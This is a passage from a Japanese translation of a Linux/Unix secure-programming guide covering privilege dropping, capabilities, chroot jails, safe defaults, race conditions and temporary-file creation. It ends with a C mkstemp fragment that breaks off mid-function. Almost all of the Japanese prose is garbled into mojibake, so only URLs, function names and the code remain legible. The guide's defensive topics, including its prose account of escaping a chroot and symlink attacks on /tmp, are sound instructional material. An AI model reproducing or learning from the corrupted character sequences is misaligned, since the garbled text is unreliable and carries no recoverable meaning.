ł͂Ȃ_ PR_SET_KEEPCAPS ͌ł Linux Ǝ̊gł_ɒ
ĂB܂Ả@͈ڐA܂BAp
ŃIvV̈S̒PȂ 1 ƂėpȂA̕@
̗p邱ƂɂāAۂɂ͈ڐA͑Ȃ܂B܂ALinux J
[l 2.2 Vo[WȂA჌x̃VXeR[͗pӂ
Ă܂BAp₷ C x̃CuCXg[
ȂfBXgr[V܂̂ŁAAvP[VŎgɂ
Ɩʓ|łB Linux  POSIX PCpreBɂĂɏڂ
́A http://linux.kernel.org/pub/linux/libs/security/linux-privs 
ĂB

FreeBSD ɂ jail()Ƃ֐Aœ𐧌Ă܂Bڂ
́A jail documentation <http://docs.freebsd.org/44doc/papers/jail/
jail.html> ĂB𐧌̂ɁAʂȃc[@\g
񂠂܂B Section 3.10ĂB

 

6.4.2. gĂ鎞Ԃŏ

}ɓivɎ̂ċĂB Linux ܂ Unix CNȃVXe
̒ɂ́Auۑvid āAuȑÓvlL^Ă̂
܂BłPȉ@́A⏕O[vǂK؂ȂÃO[v
Đݒ肷邱Ƃł(Ƃ΁Asetgroups(2)g)B setuid  setgid
vÓAʂȗRȂAʂ͎ gid  uid Ɏ id
ݒ肵ĂB fork(2)ɂ͕KB root 瑼̓ɗ
Ƃꍇ́A܂ gid ύXȂ΂ȂƂYȂłB
ȂƓȂȂ܂Bx root ̓𗎂ƂĂ܂ƁA
ȏύX̂悤ȂȂ܂BVXeł́AvZX
⏕O[vɑĂƁAO[v̕ύXł͏\ł͂ȂP[X
̂YȂłB

m̃oOŋCȂ΂Ȃ̂ɁAPOSIX PCpreB𗘗p
āA̍ŏŴ܂B̃oÓALinux J[l
2.2.0  2.2.15 ɉeAPOSIX PCpreBĂ鑼
Unix CNȃVXȇɂ炭eƎv܂B http://
www.securityfocus.com ɂ Bugtraq  id 1322 ɂɏڂ񂪂
܂BvĂ܂B

   
    POSIX uPCpreBv͍ŋ߂ɂȂ Linux J[lɎ܂
    B́uPCpreBv͓𐧌䂷@Ƃĉ
    ̂ 1 ŁAvZX̎sɑ΂āAߍׂȐ
    邱Ƃł܂BPCpreB 3 (Ȃ傫)rbgtB[
    hƂĎĂArbgtB[ĥꂼ̃rbgA
    vZXsł@\\킵Ă܂B̃rbgݒ肷
    邱ƂŁAvZX̓𐧌ł܂BKvƂȂv
    O̓̈ꕔɌ肵āA܂܂ȋ@\𗘗pANZX
    ł܂B̓ZLeB̎wWƂȂ܂B́APCpr
    eB fork()sƃRs[_ɂ܂B܂evZX
    PCpreBƁAqpĂ܂܂Bɕt
    ɂ́A3 ̃rbgtB[hꂼŁAPCpreBׂĂɃ[
    (ׂẴrbgItɂ邱ƂӖ܂)ݒ肷@
    BĂĂAR[hsOɓ𗎂ƂƂ
    setuid vO root Ŏs܂B͊댯łBsendmail
    Ă邱Ƃ܂ɂłBsendmail  setuid(getuid())g
    ē𗎂ƂƂ܂ÂɕKvȃPCpreB̃rb
    gtB[h̐ݒƂ̕Ԃl̃`FbNȂ΁A݂͎̎
    sɏI܂B̂܂܃X[p[[U̓܂܎s
    A郆[U .forward t@C root ƂēƂ\ɂ
    AɊȂ󋵂Ɋׂ܂B
   
sendmail gĂ@̈ setuid(getuid())ɂ setuid
(0) ݂AƂ̂܂Bʏ킱͎s͂łB
ƂĂAvO͒~Ă܂ł傤Bɏڂ́A
http://sendmail.net/?feed=000607linuxbug ĂB̃vO
ł΁AZIɂ͗ǂACfBAƎv܂AIɂ݂΁AM
VXeւ̃AbvO[hD܂̂ɈႢ܂B

 

6.4.3. LȎԂŏɂ

setuid(2) seteuid(2)Asetgroups(2)₻Ɗ֘A@\gpꍇ
́AvO̓KvƂ鎞ɗLƂĂ邩mF
BėpĂȂɂ́AꎞIɓ𖳌ɂĂ
BLł悤ɁA[U̓͂͂ĂԂɁA̓
ɂȂĂ邩m߂Ă܂܂Bƕ΁A{
KvȎɂLɂĂB

obt@I[o[t[Uɂ́AUƃvOɔCӂ̃R[
hsĂ܂̂܂BẴR[h́AꎞIɗƂ
ĂĂїLɂłĂ܂܂B܂ꎞIɓ𖳌ɂ
ƂĂAΉłȂU񂠂ƂƂłBɈSȂ̂
A₩ɓSɗƂĂ܂@łBΏłȂU
RŁAuseteuid()͗LQƌȂvƂ܂Ōl܂Bł
ĂAꎞIɃp[~bV𖳌邱ƂŁAׂĂ̎ނ̍Uj
݂܂B̃eNjbN͍UhP[X̂ŁAvO̊Y
镔łƓ𗎂ƂȂȂ΁AĂ݂鉿l͂܂B

 

6.4.4. F߂郂W[ŏɂ

킸ȃW[ɂF߂ĂȂÃW[S
𔻒f̂͂قǓ܂B 1 ̕@ƂāAg
W[ 1 ɂĂ܂@܂Bē𗎂Ƃ
Ă΁ÃW[ォĂяoĂԈĎg悤
Ƃ͂܂B 1 ̉@́AƗs`œƗR}
hɂĂ܂@łB̉@́AƗs`̃R}
hɂĂ܂@łBR}h 1 Gȃc[ɂȂĂāA
[U(Ƃ root)gĂтƂĂ邩
񂵁Ãc[ setuid Ă̂́APȃc[ŁA
ق̂킸Ȉꕔ̃R}hĂ邩܂BP
ȃc[́A͂܂܂Ȏ󂯓ɍvĂ邩`FbNA
̓͂󂯓̂ǂ𔻒f܂B̌A͂𐳂Ɣf
ƁAGȃc[Ƀf[^n܂BPȃc[́AOIɓ
͂`FbNAGȃc[ɓnf[^𐧌Ȃ΂܂B
ȂƂꂪƎコɂȂĂ܂܂B̉@́A
@ςݏd˂Ďsł܂BƂ΁AGȃ[Ũc[A
1  setuid ubp[vvO(͂SȒlǂ`Fb
N)ĂяoÃbp[̕GȐMłc[ɏn
܂B̕@́AGUI x[X̃VXeɂƂēɗLłBGUI ̈ꕔ
ʃ[UœAZLeB֘A̗vꍇɓ
vO֎ۂ̎s܂܂B

AvP[Vɂ́A菬āA݂ɐM֌W
vOƂĊĴԗǂꍇ܂BPȕ@Ƃ
AƗvOɕUAt@CVXe̋@\gA
vOԂŖ肪NȂ悤AOɌȂ悤ɂ肵āA (
S)1 ̂ƂsȂ悤ɂ@܂BƕGȑ݊
WKvƂĂȂÃvZX fork()Ƃ܂
BꂽvZXꂼɓ܂B̒ʐMoH͂낢
Ɛݒ\łB܂u}X^[vƂȂvZXʐMoH(OȂpCv
▼OȂ\Pbg)Ă܂@܂BɕʁX̃vZ
X fork ȂAꂼ̃vZXłł邾𗎂Ƃ܂B
ƁAfbhbNɒӂKv܂BPȃvgRg
āAMႢvZXMvZXɑ΂ėvs悤
ɂ܂BāAM̍vZXA肵vT|[
g悤ɂ܂B[UO[ṽp[~bVݒ肵āA̒N
TuvONłȂ悤ɂāA荞ނ̂ɂ
B

Iy[eBOVXeɂ́AM𕡐̑wɂRZvg
̂܂BƂ΁AMultics ̃O\ɓ܂B
WI Unix  Linux ɂ͒PƂ̃vZXŋ@\ɕ̃xŐM
i킹Ă܂BL̂悤ȊɂȂĂ܂BJ
[lɌĂяoɂ͓グ܂ÃvZX͂ 1 
̐M̃xĂ܂Bꂪ Java 2  C#(Java ̂
܂)AFluke(ZLeB Linux ̊)̒ɂȂĂ܂B
΁AJava 2 ͂̃t@CI[vp[~bVƂ
悤ȁA߂ׂ̍p[~bVwł܂BAėpIȃIy
[eBOVXeł́AʓIɂ@\Ă܂B
͋߂ɂ邩܂B Java ɂĂ̏ڂb 
Section 9.6 ĂB

 

6.4.5. fsuid gāA𐧌邱Ƃ

Linux ̃vZX͂ꂼŗL̏Ԓl 2 Ă܂Bt@CVX
ẽ[U id(fsuid)ƃtBVXẽO[v id(fsgid)łB
̒l̓t@CVXẽp[~bVɑ΂ă`FbN
Ɏgp܂Bs胆[Upt@CT[o(Ƃ NFS T[o)𑀍
悤ȃvO쐬ȂA Linux ̊g@\̗p
Ă݂ĂBg root ̓ێȂAʃ[U
㗝Ńt@CANZXO fsuid  fsgid ύX܂B̊g
Ȃ֗ŁAt@CVXẽANZX(炭Kv)̌
폜ɐdg݂񋟂܂B fsuid(euid ͐ݒ肹)
肷邾ŁA[J[U͂̃vZXɃVOi𑗂ȂȂ܂
B܂Ȁ󋵉ł͋Ԃ₷Ȃ܂B_ƂāA
̌Ăяo Unix CNȃVXeɑ΂ĈڐAȂƂ
_܂B

 

6.4.6. płt@Cŏɂ邽 chroot ̗p

chroot(2) g΃vO猩t@C𐧌ł܂B̋@\
ɂ́AfBNg(uchroot jail(chroot ̘S)vƌĂ΂Ă
)̐ݒ𒍈Ӑ[sAݒ肵ʂɂ̃fBNgɓ荞ނ悤
Kv܂B̓vÕZLeBシ̂ɁA
ʓIȕ@ƌ܂BȂt@CɊ͍̂ł
BAׂĂ̑OɗĂ͂܂BӂȂ΂Ȃ
̂́AvOɂ root ̓Ă͂ȂƁAroot ̓
ǂȕ@gĂ擾łȂƁA chroot jail mɐݒ肷
邱ƂłBgĈӖꏊchroot(2)邱Ƃ𐄏܂B
AꂾɗĂ͂܂B̂ɁȂwȂhi
̈ꕔƂĈʒuÂĂB chroot(2)̗p@ɂāA
oĂ܂B

 E vO̓}VŜɓnċLIuWFNgƂāAt@C
    VXeł͂Ȃ(System V  IPC lbg[Nz̃\Pbg)
    ˑRƂėpĂ܂Bԗǂ̂́AƗ̃[UO
    [vƂ@\킹ėp@łBUnix CNȃVXe
    ẮA[U𕪗@\Ă邩łB΁AȂ
    ƂvOĂ܂ĂÃvOɑ΂ă_
    [WȂȂ܂BoĂĂ炢̂́Aŋ߂ Unix C
    NȃVXȇ啔(Linux ܂)ł́AӐ}ċē
    삵ĂvO͕ł܂BӂvOꏏɓ
    삷̂SzȂA炩̋IȃANZX̓`l
    ւ̐ĂVXeɓĂB
   
 E Õt@Cɑ΂t@CVXẽfBXNv^AɂȂ
    ėpȂȂAKN[YĂBɁAchroot jail
    ̊OɂfBNg̃fBXNv^͉Ȃ悤ɂ邩A
    ̂悤ȃfBXNv^݂łȂ悤ȏԂɂĂ (
    Ƃ΁AUnix \Pbg͌Â` /proc oR)B chroot
    jail ̊OɂfBNgɑ΂fBXNv^vOɓn
    ĂȂAvO chroot jail ̊OɑҔ̂悢ł傤
    B
   
 E chroot jail ͈Ŝ߂ɐݒ肵Ȃ΂܂Bʃ[Ũz
    [fBNg(͂̃TufBNg) chroot jail Ɠ
    悤ɗpĂ͂܂Bʂ̏ꏊgp邩Auz[vfB
    Ng̖ړÎ߂ɓʂɕĂĂBɂ͕Kv
    Œ̃t@CuĂBʂ /bin  /etc/A/lib Ƃ
    炭 1A2 fBNg炢ł傤 (Ƃ΁Aftp T[oȂ
    /pub)B /bin ɂ chroot() ɓKv̂u
    (ɃVFû͂ł邾ĂBĂ
    ɗȂ܂)B /etc/passwd  /etc/group Kvɂ
    邩܂BĂ΁At@CꗗƐO
    \܂BȂAVXe̖{̒lȂ
    ɂApX[hׂĂKu*vɒuĂB
   
    /lib ɂ͕KvȂ̂uĂBldd(1) g /bin ɂ
    vOKvƂĂ̂oĂBĕK
    vȂ̂ĂB Linux ł́Ald-linux.so.2 ̂悤Ȋ
    {ICuƁAƂ̃Cu炭Kv
    Ȃł傤B̈AƂ̂łȂvO͐ÓIɃN
    čăRpCĂB΁AIɃ[h郉Cu
    ܂KvȂȂ܂B
   
    ʂׂ͂Ẵt@CRs[An[hN͂
    ȕ@łBfBXN̈HĂ܂܂Achroot jail
    t@Cɑ΂UAIɐK̃VXet@Cɓ`܂
    B /proc t@CVXeT|[gĂVXe /proc }
    Eĝ͌ł͂܂BۂƂĂÂo[W Linux
    (o[W 2.0.x ŏȂƂ 2.0.38)ł́A͊m̃ZLe
    Bׂ̌ɂȂĂA/proc ɂ[fBNg𗘗p
    chrootĂvO chroot 𔲂o܂B Linux J[l
    2.2 ł͂̊m̖͉Ă܂Aɂ邩
    ̂ŁAł邾ȂłB
   
 E vO root ̓lłĂ܂ƁAchroot ͌ʂȂ
    Ă܂܂BƂ΁AvO mknod(2)̂悤Ȋ֐Ăяo
    ƁAfoCXEt@C쐬łĂ܂܂
    BȂĂ܂ƁAJ[lăvOɖ]݂̓
    ^܂B root ̓vOAchroot 𔲂o
    Ă܂̗ http://www.suid.edu/source/breakchroot.c ŗᎦ
    Ă܂B̗Ă݂܂BvOt@CfBX
    Nv^JgfBNgpɃI[v܂BTufBNg
    A chroot ܂BJgfBNgɐI[v
    JgfBNgݒ肵܂BĂуJgfBNg
    ʃfBNg cd ܂(ƁA chroot ̊OɏoāA
    ۂ̃t@CVXe root ɈړĂ܂܂)BĈړ
     chroot ܂Bǂނ܂łɁA̐Ǝ㐫͍ǂĂ邩
    ܂B root ̓́AƂƁuׂāvӖ
    Ă͎̂ŁAD̂܂BvO
    root ̓pĕKvȏꍇAchroot()gpƏ͖ɗ
    AƂxɍlĂǂł傤BAvO
    ̕ɕāAȂƂ̈ꕔ chroot jail ɓ܂B
   
 

 

6.4.7. ANZXłf[^ŏɂ邱Ƃ

[UANZXłf[^ʂŏɂ邱ƂĂB
Ƃ΁ACGI XNvgȂA[Uڃf[^Ȃ΂ȂȂR
ȂACGI XNvgpf[^ׂ͂ăhLgc[
OɒuĂBNJĂȂ΁ANf[^ɃANZX
ȂAƌĂl܂B͐΂ɊԈĂ܂B

 

6.4.8. pł郊\[Xŏɂ邱Ƃ

vZXpłRs[^̃\[XŒɂ悤ɔz
B΁AvZXu߂ႭvɂȂĂ_[W
͈̔͂Ȃ܂B́AT[rXۍUĥɕK{̕@ł
Blbg[NñT[oł́Aꂼ̃ZbVɑ΂ēƗv
ZXݒ肷̂ʓIȂłBꂼ̃vZX̓ZbV
g CPU pԓ̑ʂɐ܂B΁AU҂
Hׂ悤ȗvACPU  100% g؂肵悤ƂĂ
AĒPƂ̃ZbṼ^XNɎx𗈂̂h܂B
AU҂͂̃ZbV𒣂܂A͏ȂƂU
ɂƂďQƂȂ܂Bǂ̂悤ɐ邩ɂĂ Section 3.6
ɏڂ񂪂܂(Ƃ΁Aulimit(1))B

 

6.5. 1 ̍\vf̋@\ŏɂ

֘A肾ĂƂāA\vf񋟂@\̐ŏɂĂ
B\vf̋@\񋟂ĂȂA菬ȋ@\ɕ
邱ƂĂB΁A@\KvƂȂ[
ÚAKvƂȂ@\𖳌ɂł܂BׂɁA
͓ɏdvłB̕@̗p΁A[U͂ 1 ̍\vf
ɂ邾ŁA͎g邩łB

 

6.6. setuid  setgid XNvggȂ

Unix CNȃVXȇA Linux ł́AXNvgɐݒ肵Ă
setuid  setgid rbg𖳎āAԂĂ܂B͐ɏq
ׂʂłB setuid XNvgɑ΂ Unix CNȃVXẽT
|[g͂܂܂Ȃ̂ŁAVAvP[Vł͉\Ȍ
̂xXgłBOƂ Perl ́AʂȐݒقǂƂŁAsetuid
 Perl XNvgsł悤ɂȂ܂B܂{ɂ̎̋@
\KvȂA Perl g setuid  setgid g悤ɂȂ܂B
̎̋@\̃C^v^ŃT|[gKvȂAPerl 
Ă̂𒲂ׂĂ݂ĂBAȒPȕ@ƂāAsetuid 
 setgid Ȏs`ŃXNvgubvvASȊ(
ϐNAɂŐݒ肷)\zĂAXNvgĂяo
@܂(XNvg̃tpXg)BU҂XNvgΕ
XłȂ悤ɂĂBVFXNvgɂ͂Ɩ肪
̂ŁAsetuid  setgid ׂł͂܂B̓_̏ڂ
ASection 9.4 ĂB

 

6.7. ݒSɂASȃftHggp

ZLeBňԖƂȂ̂́AݒɂƂĂ܂B
Ď 2 _ɂ͘J͂ĂB(1)CXg[Sɂ
邱ƁB(2)SێAVXeȒPɍĐݒł邱ƁB

CXg[ƒɁAƗpuftHgvpX[hĐݒ肵Ȃ
łBVu[Uvݒ肷KvȂAsĂ\ł
B΂ɂ킩ȂpX[hݒ肵āAǗ҂pX[hݒ肷鎞
ԂcĂĂ(pX[hݒ肷ȑOVXeSɂ
܂)BǗ҂͂炭̃pbP[WCXg[̂ŁApX
[hݒ肵ǂ\YĂ܂܂BftHg̃pX
[hō쐬ĂA炭Ǘ҂͐ݒ肵ƂmȂ܂
B 

Ǘ҂ݒ肷@܂ŁAvOɑ΂ẮAANZX
ɂ|VێĂBݒ蓖ɁuTvɂv
p[UAuׂĂɃANZXvݒ肵Ȃł
BɃ[ÚuׂĂCXg[v(płT[rXׂăC
Xg[) ꍇÂ܂܃T[rX̑唼ݒ肵Ȃ܂܂ɂ
Ă܂B̔F؃VXeŁAƊɂ₩ȃ|VKł
ƃvO߂Ă܂ꍇ܂BƂ ftp T[oł́A[
ŨfBNgɃOCł郆[Uɂ́A[Ũt@CɃANZX
悤ɔF߂Ă܂B̂悤ȑOɂ͒ӂ𕥂
B

CXg[VEXNvǵAłSɃvOCXg
[ĂBftHgł́Aroot ͑̃VXe֘Ã[U
I[i[ɂȂĂׂẴt@CCXg[Ȃ̃[U
߂Ȃ悤ɂĂ܂B root ȊÕ[UECXCX
g[̂h܂BہAMł郆[UȊOɂ́Aǂݍ݂ł
Ȃ悤ɂ̂őPłB root ȊÕ[U root ƓlɃCX
g[łꏊpӂĂB΁Aroot ̓̂Ȃ[
UCXg[MĂȂǗ҂łÃvO𗘗p
܂B

CXg[鎞ɂ́AZLeBɕK{̑O񂪂ȂłĂA
ǂK`FbNĂBCũ[`ɂ́A
vbgtH[ňSł͂Ȃ̂܂B̓_ɂẮA
Section 7.1 ̋c_ĂB̃vbgtH[ŃAvP[V
삷̂킩ĂȂAvbgtH[L̑`Fb
NKv͂܂BÃvbgtH[̂ǂꂩ 1 ɂ
vOCXg[ȂAK`FbNKv܂B
Ȃ΁AvOCXg[̂Ƀ}jAŖɂKv
͂łBȂȂACXg[ʂSǂ킩
łB

ݒ̓CXg[̐ݒ܂߂āAł邾ȒPĂɂł悤ɂ
ĂBł邾uSȁv@g悤ɂĂBȂ
ƁA[Ȗ́AXN𗝉ɈSłȂiIł܂ł
傤B Linux ł linuxconf ̂悤ȕ֗ȃc[A[U
\𗘗pĊȒPɃVXeݒł܂B

ݒpꂪȂA[UʂɋȂftHgł̓ANZ
XۂĂBTv̐ݒt@Cɂ́A₷Rg
ĂBꂪ΁AǗ҂͐ݒ肪ł̂
܂B

 

6.8. lSɃ[h

vȎ́At@CǂŃftHg̐ݒ肪ł܂B
U҂gp鏉t@C̕ύXA쐬AC΂łȂ悤ɂ
ĂBJgfBNgt@C̏񌹂ɂׂł
܂BGfB^uEUƂăvO𗘗pȂAʂ̒N
Rg[ĂfBNg[UĂ܂Ȃ
łBł͂ȂAvOʂ̃[UAvP[VȂA[
ŨftHg̐ݒ́Ã[Ũz[fBNgɁABt@C
fBNgƂĒuĂB̃vO setuid  setgid
ĂȂA[URg[Ăt@CMłȂ(ӂ
Ă邩Ȃ)͂ƂĐTdɃtB^ȂÃt@
Cǂł͂܂BMłݒĺA܂ǂƂ
납(ʂ /etc ̃t@C)[hĂB

 

6.9. tFCEZ[t

SKvȃvÓAutFCEZ[tvɂĂB
܂AvO삵ȂȂĂAԈSȌʂɗ
ɐ݌vĂBZLeBɕqȃvÓA炩̊Ԉ
mȂ (ُȓ͂uN蓾ȂvԂɂȂ铙)AvO
͂ɃT[rXۂAv̂~߂ĂBu[
UӐ}邱ƂTov́AȂłBT[rX
ۂĂBƁAƂĐMg肪Ȃ邩
܂([U̗ꂩ炷)BS͍܂܂B킸ł
Ȃꍇ܂(Ƃ΁AT[rXۂ`ۑS
P[X)B͔ɂ܂łB

́u傭ɋ@\ȂȂvł͂ȂAu̗v̏~߂
vƂ𐄏Ă_ɒӂĂBɁA啔̃T[óA
͂ĂSɒ~ׂł͂܂BSɒ~Ă܂
ƁAƂƂŃT[rXۍU\ɂȂ邩ł(U҂͕sv
ȃrbg𑗂邾ŁAT[rXgȂĂ܂܂)BT[oŜ
ƂKvłĂꍇ܂BɁu͂ȂȂvԂ́A肪
钛Ȃ̂ŁAƂ肠p̂͌@Ƃ͌܂B

smꍇ́AԂėG[bZ[Wɂ邩Td
ĂBԂĂȂƖff̂ɂȂ܂
AtɁAߏȏ͍U҂ʓIɏ邱ƂɂȂ邩܂B
ʂɓK؂Ȃ̂́Auaccess deniedvumiscellaneous error encounteredv
ԂāAڍׂȏčO(̏lRg[ł
ꏊɂ)ɏ@łB

 

6.10. Ԃ

uԁv͎̂悤ɒ`Ă܂BuCxgm삷鑊
Iȃ^C~OAvȂˑ֌WɊׂĂ܂댯ȓ
v [FOLDOC]BԂ͒ʏA1 ȏ̃vZXL\[X(t@C
ϐ)ɃANZX鎞ɔۂŁÃANZXK؂ɐł
Ȃ܂B

ʏvZX̓Ag~bNɂ͓삵܂Bʂ̃vZX͊{I 2 
ߊԂɊ荞݂܂BSKvƂȂvÕvZXÅ
݂ɔĂȂ΁Aʂ̃vZXWQł\܂B
SKvȃvOĂԂɁAʃvZX̃R[h
Aꂪǂȑ̑gݍ킹łĂAvO͐mɓȂ
΂܂B

Ԃ̖́A2 ̃JeSɕނł܂B

 E MłȂvZXɂWQBZLeB̕ނł̖͂u
    V[PXv́uAg~bNvԂƌĂł܂B̏
    Ԃ́ÄقȂvÕvZXƂŔ܂BS
    vO̖߃XebvԂɁA̓삪uEэ݁v܂BU҂
    ̖NƂ_āÃvOŝ
    ܂B̃hLgł͂V[PXƌĂт܂B
   
 E MꂽvZXɂWQ(SȃvO̊ϓ_)BZL
    eB̕ނł́AfbhbN⃉CubNAbNsԂƌĂ
    ܂B̏Ԃ́u悤ȁvvÕvZXƂŔ
    ܂Bꂼ̃vZX́u悤ȁvĂ̂ŁA
    䂵ĂȂƂ݂Ɋđ̃vOsł
    ȂĂ܂܂B̎̊ƂčUɗp
    ܂B̃hLgł͂bNƌĂт܂B
   
 

6.10.1. V[PX(Ag~bN)

ʓIɁACӂ̃R[h 2 ̑ԂŎsƑ̑gݍ킹ɂ
ċ@\ȂȂׂ̂ĂAӐ[`FbNȂ΂܂B

LĂϐ[hZ[uꍇAʂ͓ƗŎs
AAg~bNȑɂ͂ȂĂ܂BǂƂƌƁAu
ϐv̑́Aʏ탍[hāAāAۑƂɒu
܂BāAϐ̃𑼂̃vZXƋLĂ΁A
̑ɊĂ܂܂B

SKvȃvÓAvׂȂ̂𔻒fAł
s܂B̃vOfɂƂÂē삷OɁAMłȂ
[U̔fʂgāAύXiĂ͂܂B
̎̋Ԃ́u`FbNgp(time of check - time of use
(TOCTOU))vԂƌĂ΂鎞܂B

 

6.10.1.1. t@CVXẽAg~bNȎs

Ag~bNȓ̎s@\ȂȂ́At@CVXełxX
܂Bt@CVXeƂ̂́ÃvOL
Ă郊\[XłBvOɂ́ÃvO\[XgƊ
󂯂Ă܂̂܂BSKvȃvOł́ANGXg
邩ǂ̔fɍۂ open(2) ɐ旧 access(2) s
͎̂~߂ĂBŔA[ǓĂяo̊ԂɃt@C
āÂɎőI񂾃t@CɃV{bNN𒣂Ă
܂ꂪ邩łBSKvȃvÓA id t@CV
Xe id ݒ肹ɁA open ĂяołB access(2)
̈SȎgp\łA̓[Ũt@Ct@CVXe
̃[g̃pXɂfBNgɉe^ȂꍇɌ
B

t@C쐬鎞ɂ́AO_CREAT | O_EXCL [hgăI[vAp
[~bV(݂̃[UɌ肵)̂
΂܂B܂Aopen sꍇɂKv܂Bt
@C open łKvȂ(Ƃ΁AT[rXۍUh
)A (1)u_vȃt@CA(2)L̂悤ɊJA(3)open 
JԂȂAƂƂ𖈎sȂȂ΂Ȃ܂B

ʂ̃vOt@Cƍ쐬ȂƁAZLeB̎_
ɂȂ\܂BƂ΁AujoevƂeLXgGfB^́Au
DEADJOEvƂAV{bNNɊւƎ㐫Ă܂B joe
CM[ɏIꍇ(VXeNbV xterm Alb
g[Nڑ؂铙)Ajoe JĂobt@uDEADJOEvƂt
@CɖŒǉ܂B root ʏ joe gfBNg̒
DEADJOE ̃V{bNN쐬ƂĂ܂܂B
ȂƁAjoe ̓S~f[^Ƌ@܂łt@C
ɒǉ悤ɂȂāAʂƂăT[rXۂɂȂAӂ̂ȂA
NZX肵܂B 

̗ƂāAt@C̃^낢둀삷Ƃsꍇ(I[i
[̕ύXAt@C̏ԊmFAp[~bVrbg̕ύX)A܂t@C
JāAJt@Cɑ΂đ삵ĂB܂肱́Achown
() chgrp()Achmod()̂悤ȃt@C󂯂Ƃ֐ł͂ȂAfchown()
 fstat()Afchmod()VXeR[gƂӖĂ܂B
ƂŁAvO삵ĂԂɃt@C̒uh܂ (
炭Ԃ)BƂ΁At@CĂAchmod()g
p[~bVύXƁAU҂͂ 2 XebvԂɂ̃t@C
͍폜Aʂ̃t@Cɑ΂ăV{bNN𒣂Ă܂
邩܂(Ƃ΁A /etc/passwd ɑ΂)B̋[t@C
 1 Ƃ /dev/zero ܂B̃t@C͖̃f[^Xg
[͂ƂăvOɓn܂BU҂rŃt@Cu؂
vȂA댯ȌɂȂ܂B

Aɖʓ|ȂƂ܂Bt@C쐬鎞́Ał邾
Œ̌^ŁA]ނȂƌL悤ɕύXȂ
Ȃ_łBʓIɂ́Aumask  open ̃p^gāA[U
₻̃[ŨO[vŏɃANZXɐKv
BƂ΁At@C쐬Aŏ͒Nłǂ߂ԂuNł
ǂ߂vrbg𗎂ƂƂƁAU҂̓p[~bVrbg OK 
ԂɃt@CJƂ܂BĂ Unix CNȃVXeł
Ap[~bV open Ƀ`FbN邾Ȃ̂ŁAӐ}̂
U҂ʂɂȂ邩܂B 

ʓI Unix CNȃVXeɂāÃ[UfBNg
ɏ݂łȂÃfBNgɁustickyvrbgݒ肵
ǂł傤Bsticky ȃfBNgǂȂ܂B
A̖SɔȂAMłʂȃvZXAN
ZXłfBNg(TdɎ)ADĂ܂B
܂ł Unix ňꎞIɎgpfBNg(/tmp  /var/tmp)́A
ustickyvfBNgƂĎĂ܂AłZLeB
̂肪\ʉĂ܂B炻̓_Ă܂傤B 

 

6.10.1.2. e|Et@C

e|Et@C쐬鎞ɁAAg~bNȑ𐳂s
ł̖肪Ɍ܂B܂ Unix CNȃVXeł́Ae|
Et@C /tmp  /var/tmp fBNgɍĂĂA
[UׂĂLĂ܂BSKvȃvO삵ĂԁA
̃t@C(Ƃ΁A/etc/passwd) ɑ΂V{bNNe|
EfBNgɍ쐬㩂U҂͎d|Ă܂BU҂̑_
́ASKvȃvOÃt@C݂ȂƔf
󋵂グĂAU҂ʂ̃t@Cւ̃V{bNN
āASKvȃvOɂ鑀sԂł(ۂ͈Ӑ}
ĂȂt@CJĂ܂Ă)B̕@ł悭dvȃt@C
ꂽACꂽ肵܂Bʂ̃t@C쐬悤Ȃ̎̍U
̃oG[V͂񂠂܂B̍ÚASȃvOŎg
pe|Et@Ĉ݂ƓfBNgɁAU҂t
@CVXeEIuWFNg쐬ł (Ȃ΃ANZXł)
ɂƂÂĂ܂B

LfBNgɃt@C쐬ŋʂ̖_́Agp\肵
t@CA쐬Ɋɑ݂ĂȂƂۏ؂Ȃ΂
_łBt@C쐬uOvɃ`FbN̂͌ڂ܂
BŔA`FbNォt@C̍쐬OɁAʂ̃vZX̃t@C
Ńt@C쐬łĂ܂łBu\s\v́uj[
Nvȃt@CĝA悻ʂ܂B́AO̐
܂ŁAʃvZXxłł邩łB

{IɁALĂ(sticky Ă)fBNgŃe|Et
@C쐬ɂ́ÂƂJԂsKv܂B(1)u_
vȃt@C쐬邱ƁA(2)O_CREAT | O_EXCL g open A
p[~bVł邱ƁA(3)open ȂAJ
ȂƁAłB

1997 Nł́uSingle Unix SpecificationvɂƁACӂɃe|Et
@C쐬̂ɖ]܂@́Atmpfile(3)gAƂȂĂ܂B
tmpfile(3)֐̓e|Et@C쐬AɑΉXg[
 open ÃXg[̃fBXNv^Ԃ܂(s NULL 
Ԃ܂)BɂAt@CSɍ쐬ۏ؂͎dl؂܂
B̃hLg̋łŁAׂĂSǂmMłȂ̂
SzAƏqׂ܂B̌AÂ System V VXe tmpfile(3)̎
Sł͂ȂƂ킩Ă܂(tmpnam(3)  tempnam(3)lɈS
łȂ)B tmpfile(3)Ă郉CúÂ悤ȃt@
CSɍ쐬ׂłA[U̓VXẽCuɃZLe
Bׂ̌邱ƂAKCt킯ł͂܂Bꍇɂ
͂̌ɂāAł肪Ȃ܂B

Kris Kennaway ́Ae|Et@C̍쐬ɓāAʂ
mkstemp(3) ̎gp𐄏Ă܂Be|Et@CȂA
gŊ֐グėpA悭m炽Cug
ǂAƂ̂łBĂ̊֐͂悭mꂽg̗p
܂B͂ȂƂȌłB mkstemp(3)gȂA͂
ɉĕK umask(2)gāAe|Et@C̃p[~bV
L҂ɂȂ悤ɐ܂B mkstemp(3)̎({Iɂ
Â)ɂ́Ae|Et@CׂẴ[Uɑ΂āAǂݏ\
ɂĂ̂邩łB̏ԂɂȂƍU҂́ÃfBNg
ɃvCx[gȃf[^ǂݏ\ɂȂ܂BȂ̂́A
mkstemp(3)ڂɂ TMP  TMPDIR ƂϐT|[gĂȂ
_ł(LŘ_܂)BŊϐT|[gƂȂƁA
T|[gł悤ɃR[hǉȂ΂܂BŁAϐ
T|[g C ŏ mkstemp(3)̎gvOfڂ
܂BŁATMP  TMPDIR ̃T|[gǉ邱ƂŁAڗ
̑삪\ɂȂ܂B

#include <stdio.h>                                                              
#include <stdlib.h>                                                             
#include <sys/types.h>                                                          
#include <sys/stat.h>                                                           
                                                                                
void failure(msg) {                                                             
 fprintf(stderr, "%s\n", msg);                                                  
 exit(1);                                                                       
}                                                                               
                                                                                
/*                                                                              
 * Given a "pattern" for a temporary filename                                   
 * (starting with the directory location and ending in XXXXXX),                 
 * create the file and return it.                                               
 * This routines unlinks the file, so normally it won't appear in               
 * a directory listing.                                                         
 * The pattern will be changed to show the final filename.                      
 */                                                                             
                                                                                
FILE *create_tempfile(char *temp_filename_pattern)                              
{                                                                               
 int temp_fd;                                                                   
 mode_t old_mode;                                                               
 FILE *temp_file;                                                               
                                                                                
 old_mode = umask(077);  /* Create file with restrictive permissions */         
 temp_fd = mkstemp(temp_filename_pattern);                                      
